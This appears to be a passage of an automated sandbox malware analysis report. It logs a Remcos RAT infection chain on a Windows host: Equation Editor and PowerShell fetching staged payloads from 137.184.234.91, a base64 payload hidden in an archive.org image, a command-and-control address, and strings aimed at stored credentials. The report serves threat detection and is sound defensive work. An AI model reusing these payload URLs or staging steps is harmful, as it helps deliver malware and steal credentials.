                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49174
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 137.184.234.91:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 137.184.234.91:80
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175
                Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49175

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49177 -> 45.90.89.98:8243
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49178 -> 45.90.89.98:8243
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 137.184.234.91:80 -> 192.168.2.22:49176
                Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 137.184.234.91:80 -> 192.168.2.22:49176
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49175
                Source: Malware configuration extractorURLs: 45.90.89.98
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 45.90.89.98:8243
                Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /77/RBCF.txt HTTP/1.1Host: 137.184.234.91Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
                Source: Joe Sandbox ViewIP Address: 45.90.89.98 45.90.89.98
                Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
                Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49179 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /GQ1oBm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: a38.frConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 137.184.234.91Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /77/weneedsmoothbunwithbutterchoco.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 137.184.234.91Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 45.83.105.92:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49175 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.234.91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_0041B411
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3E7F476.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /GQ1oBm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: a38.frConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /77/cn/weneednewthingstogetmegreatthingsbuttersmoothchocolatecurnchiwaferwithnicebiscutwithentirethingstobegetmeback________newbuttersmoothbutter.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 137.184.234.91Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /77/weneedsmoothbunwithbutterchoco.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 137.184.234.91Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /77/RBCF.txt HTTP/1.1Host: 137.184.234.91Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: bhvB5B9.tmp.15.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                Source: RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.494844685.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: bhvB5B9.tmp.15.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                Source: powershell.exe, 0000000D.00000002.467858550.0000000004EFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: RegAsm.exe, 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: RegAsm.exe, 0000000F.00000002.497843555.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: a38.fr
                Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 28 Aug 2024 12:00:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINContent-Security-Policy: default-src 'none'
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 28 Aug 2024 12:00:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINContent-Security-Policy: default-src 'none'
                Source: powershell.exe, 0000000D.00000002.465020760.0000000002772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.234.91
                Source: powershell.exe, 0000000D.00000002.465020760.0000000002772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.234.91/77/RBCF.txt
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.444358881.00000000002AF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.443731290.0000000000323000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.444358881.00000000002A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIF
                Source: EQNEDT32.EXE, 00000009.00000003.443731290.0000000000323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.234.91/77/weneedsmoothbunwithbutterchoco.tIFC:
